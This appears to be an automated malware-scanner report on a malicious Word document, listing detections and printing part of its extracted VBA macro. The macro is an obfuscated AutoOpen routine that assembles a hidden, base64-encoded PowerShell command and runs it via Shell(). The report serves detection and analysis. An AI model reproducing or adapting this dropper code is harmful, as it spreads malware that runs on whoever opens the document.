MALICIOUS
242
Risk Score
Heuristics 7
-
ClamAV: Doc.Malware.Valyria-7086204-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Valyria-7086204-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12970 bytes |
SHA-256: 57084f2ff5cf1015c7b1a4771797a06c2ce36705958cfe2bada0767a835cf093 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "jRdwPLBiNu" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function QjFOzMuFH() On Error Resume Next jBzli = Fix(78796 / CSng(35193) * DLWoO * Odfij) VhBn = CDate(9304) GVQBnI = Fix(47579 / CSng(54290) * PiJumB * hGqdV) VhBn = CDate(6606) QjFOzMuFH = WIGvnJZSW + IZrGPU + RVEouTFqpi + WbGNzM + AkVBGHCqw + dsJUBkjmNH + vGXjncJ + rLqcdZd + UTHzWuPHmc + QsFTE uLzBH = Fix(24278 / CSng(33240) * GTTaji * rjtjVv) VhBn = CDate(76819) End Function Sub Autoopen() On Error Resume Next UaNbzX = Fix(81139 / CSng(51725) * CGWqpG * PQfbp) VhBn = CDate(51739) hKDLhri (QjFOzMuFH) USwPJ = Fix(69965 / CSng(72708) * SGjdbu * TLQssX) VhBn = CDate(50146) End Sub Function hKDLhri(FCDzacX) On Error Resume Next tBZcU = Fix(9953 / CSng(30068) * qtOtI * IjqpVn) VhBn = CDate(29394) QVAzjzuJqI = nJNAfilZQ + Shell(hiljBwBPh + (Chr(vbKeyP)) + mfjjjfBWJw + FCDzacX + sWwPKFD, nYOjN + vbHide + rOOhDttIU) LfWiw = Fix(38560 / CSng(22201) * iouGFN * HRcDuq) VhBn = CDate(70106) End Function Attribute VB_Name = "AcUDjCCC" Function WIGvnJZSW() On Error Resume Next RVkpM = Fix(45547 / CSng(20907) * kFcFvV * wPwzJM) VhBn = CDate(47429) cmklnOKU = "owersHeLL" + " -WinDo" + "wsTyle hidden" + " -e IAAoAC" + "gAKAAi" + "AHsANwA2AH0Aew" + "AxAH0AewA1ADAAf" + "QB7ADkAMQ" + "B9AHsAO" cHVkm = Fix(90689 / CSng(68362) * EDWfzX * VPBfF) VhBn = CDate(112) SuwwUAli = "QB9AHsANwA5AH0" + "AewAyADUAfQB" + "7ADIA" + "OAB9AHsAMQA2AH0" + "AewAyADkAfQB" + "7ADYANQB9AHs" BFCPGM = Fix(82295 / CSng(64932) * otSHi * nYBBiY) VhBn = CDate(2995) NtfXtHh = "AMwAwAH0A" + "ewA4ADIAfQ" + "B7ADYAOQB9AHsAN" + "AAxAH0AewA4" + "ADUAfQB7ADQ" + "AOQB9AHsAMwA" + "2AH0AewA3AH0Aew" + "A3ADAAfQB7ADI" qvZCa = Fix(69524 / CSng(16177) * TCdFQi * oXjWo) VhBn = CDate(65460) sHckqkENNO = "ANwB9" + "AHsANwA" + "4AH0AewA4ADE" + "AfQB7ADYANgB9" iPifcd = Fix(57294 / CSng(8813) * ZzjMU * JQzGHa) VhBn = CDate(31529) dtMdwVWLk = "AHsAMwA0AH0AewA" + "0AH0AewA1AH0Ae" + "wA4AD" + "MAfQB7ADI" WIGvnJZSW = cmklnOKU + SuwwUAli + NtfXtHh + sHckqkENNO + dtMdwVWLk End Function Function IZrGPU() On Error Resume Next cZFCNd = Fix(90562 / CSng(4235) * qDRJY * IfDOhD) VhBn = CDate(11379) jamUMd = "AMwB9AHs" + "ANgAzA" + "H0Aew" + "A4ADgAfQB7ADQA" + "NgB9A" + "HsANwA0AH0Aew" + "AzAH0A" + "ewA3ADEAfQB7ADY" + "AOAB9AHs" VCGNTY = Fix(65501 / CSng(50973) * OlBGX * QaaXmp) VhBn = CDate(16957) RESjJBi = "AMQA4AH0Aew" + "A1ADgAfQ" + "B7ADA" + "AfQB7ADYAMAB9" + "AHsANQA5AH0A" + "ewAzA" YlVpb = Fix(8231 / CSng(22412) * aWpjzH * bdiQr) VhBn = CDate(4999) iuiHzUKzd = "DkAfQB7" + "ADIAN" + "gB9AHs" + "AMgA0AH" + "0AewA2ADQAfQB7A" + "DYANwB9AH" + "sANAAwAH0" + "AewA1A" WokEn = Fix(76234 / CSng(13246) * SvMzhc * jGWAfK) VhBn = CDate(59211) clPDDG = "DYAfQB7ADQANAB9" + "AHsANAA1A" + "H0AewAyAD" + "EAfQB7ADcAMgB" + "9AHsAMw" + "AxAH0AewAx" + "ADUAf" + "QB7ADMAMwB9AHsA" + "NQA1AH0AewA" IZrGPU = jamUMd + RESjJBi + iuiHzUKzd + clPDDG End Function Function RVEouTFqpi() On Error Resume Next nbIKw = Fix(89191 / CSng(15724) * RAzOj * WRYcv) VhBn = CDate(7399) CiTBSpzB = "2ADEAfQ" + "B7ADgAOQB9" + "AHsAOAA2" + "AH0AewA1ADQAfQB" + "7ADQANwB9AHsANA" + "AzAH0AewAyADIA" + "fQB7ADIAfQB" + "7ADUAMQB9AHs" + "AMwA4AH0A" WAZndu = Fix(46203 / CSng(88541) * XOrXzd * cIlKVv) VhBn = CDate(97841) YGcjTGzYpMO = "ewA0ADIAfQB7ADU" + "ANwB9AH" + "sAMQA" + "zAH0AewA" + "zADcAfQB7ADYAfQ" + "B7ADEANAB9AHsAM" + "QAyAH0Aew" + "A4ADcAf" NRijEc = Fix(5429 / CSng(29217) * XRajXU * kfadl) VhBn = CDate(43486) nriURZCFm = "QB7ADgAMAB" + "9AHsANwAzAH0A" + "ewA3ADcAfQB7AD" + "YAMgB9AHsAMw" + "AyAH0" + "AewA3" + "ADUAfQB7ADgAfQB" + "7ADEA" HtnvU = Fix(18479 / CSng(86634) * bBrZM * opOUz) VhBn = CDate(32689) BkQsQqRuVNc = "NwB9AH" + "sAMQAwAH0" + "AewA4ADQAfQB" + "7ADUAMgB9AHsAMQ" + "AxAH0AewAzADUAf" + "QB7ADIAMAB" + "9AHsANAA" RVEouTFqpi = CiTBSpzB + YGcjTGzYpMO + nriURZCFm + BkQsQqRuVNc ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.